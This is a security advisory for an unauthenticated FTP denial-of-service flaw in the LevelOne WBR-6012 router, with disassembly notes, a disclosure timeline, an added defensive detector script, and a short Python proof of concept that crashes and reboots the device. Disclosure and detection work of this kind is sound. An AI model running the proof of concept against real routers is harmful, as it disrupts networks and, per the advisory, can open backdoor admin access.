CVE-2024-33700
The LevelOne WBR-6012 router firmware R0.40e6 suffers from an input validation vulnerability within its FTP functionality, enabling attackers to cause a denial of service through a series of malformed FTP commands. This can lead to device reboots and service disruption.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6012 R0.40e6
WBR-6012 - https://us.level1.com/products/wbr-6012
7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-20 - Improper Input Validation
The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.
The LevelOne WBR-6012 fails to validate user input, allowing an attacker to reboot the device by sending a series of unauthenticated FTP inputs.
The main FTP function is located at 0x800c1a44 and handles command line input for several FTP commands. However, the device does not properly handle receiving input before it has sent the output of the previous command. For example, when sending an FTP command, a normal FTP client will wait for a response from the server before sending the next message. The device accounts for this scenario: receiving a command, parsing and processing it, sending an appropriate response message, and waiting for the next command.
However, if an attacker were to send multiple messages before the device has fully completed the command-processing loop, an unknown error occurs causing the device to crash and reboot. The FTP protocol uses a carriage return and line feed (\r\n) to indicate the end of a command, and this vulnerability can be triggered by sending any sequence of characters terminated by \r\n, including legitimate FTP commands, in quick succession. The TCP stream in such a scenario could resemble the following:
220 FTPd 1.6
AA
500 Bad command
AA
AA
500 Bad command
Note the third “AA\r\n” occurs before the response from the second. The device crashes and reboots at this point.
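Added example, not from the advisory: a small Python detector that walks a captured FTP conversation, given as an ordered list of client/server segments the way a sensor or pcap parser would hand them over (an assumed input format), and flags any command line the client sent while an earlier command was still unanswered, which is the interleaving shown in the stream above. It reassembles lines across segment boundaries and treats the 220 banner as a reply to nothing.

```python
import re
from typing import Iterable, List, Tuple

# Each event is (direction, payload) in wire order, as a sensor or pcap parser
# would supply them (assumed format): "C" = client -> device, "S" = device -> client.
Event = Tuple[str, bytes]

CRLF = b"\r\n"
# FTP reply lines: three-digit code, then a space (final line) or '-' (multi-line start).
REPLY_RE = re.compile(rb"^(\d{3})([ -])")


def find_pipelined_commands(events: Iterable[Event]) -> List[Tuple[int, bytes]]:
    """Return (event_index, command_line) for every client line that was sent
    while a previous command was still unanswered by the server."""
    findings: List[Tuple[int, bytes]] = []
    cbuf = b""          # partial client line carried across segments
    sbuf = b""          # partial server line carried across segments
    outstanding = 0     # commands sent but not yet answered
    greeted = False     # the 220 banner answers no command
    for idx, (direction, payload) in enumerate(events):
        if direction == "S":
            sbuf += payload
            while CRLF in sbuf:
                line, sbuf = sbuf.split(CRLF, 1)
                m = REPLY_RE.match(line)
                if m is None or m.group(2) != b" ":
                    continue            # not the final line of a reply
                if not greeted:
                    greeted = True
                elif outstanding:
                    outstanding -= 1
        else:
            cbuf += payload
            while CRLF in cbuf:
                line, cbuf = cbuf.split(CRLF, 1)
                if outstanding > 0:     # sent before the previous reply arrived
                    findings.append((idx, line))
                outstanding += 1
    return findings


# Constructed sample reproducing the stream shown in the advisory, in wire order.
SAMPLE_STREAM: List[Event] = [
    ("S", b"220 FTPd 1.6\r\n"),
    ("C", b"AA\r\n"),
    ("S", b"500 Bad command\r\n"),
    ("C", b"AA\r\n"),
    ("C", b"AA\r\n"),            # third "AA" arrives before the reply to the second
    ("S", b"500 Bad command\r\n"),
]

if __name__ == "__main__":
    print(find_pipelined_commands(SAMPLE_STREAM))  # [(4, b'AA')]
```

A single hit is enough to flag the session against this device, since the advisory reports a crash on the first overlapping command.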
Early in the main FTP function (0x800c20a0) a buffer is created (0x800c1b14) to receive and process network data. Almost all of the FTP application’s logic exists within the command-processing loop that follows.
recv_data_buffer
800c1b14 21 28 c0 02 move a1,s6
800c1b18 46 11 00 0c jal recv_data_get_buf_size undefined recv_data_get_buf_size(dword request, char * buffer, dword size)
800c1b1c bc 05 06 24 _li a2,0x5bc
Near the end of the command-processing loop, at 0x800c2084, the output response message is moved into the a1 register before being passed to a send message function.
800c2084 21 28 40 02 _move a1=>s_500_Bad_command_80102560,output
The application then returns back to the start of the loop. This sequence is a likely candidate for the root cause of the crash, but without debug access to the device we cannot say with absolute certainty.
The below PoC sends a series of three unauthenticated FTP commands. This PoC is the simplest example, but any combination and sequence of inputs can result in a crash if sent in quick succession.
import socket

host = '192.168.1.1'  # device default
port = 21

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((host, port))
print(s.recv(1024))  # 220 banner
for i in range(3):
    s.send(b'AAA\r\n')  # any \r\n-terminated input, sent in quick succession
    print(s.recv(1024))  # may time out once the device has crashed and rebooted
s.close()
The device will crash and do a “hard” reboot (allowing for backdoor admin access via TALOS-2024-1979).
2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release
Discovered by Patrick DeSantis of Cisco Talos.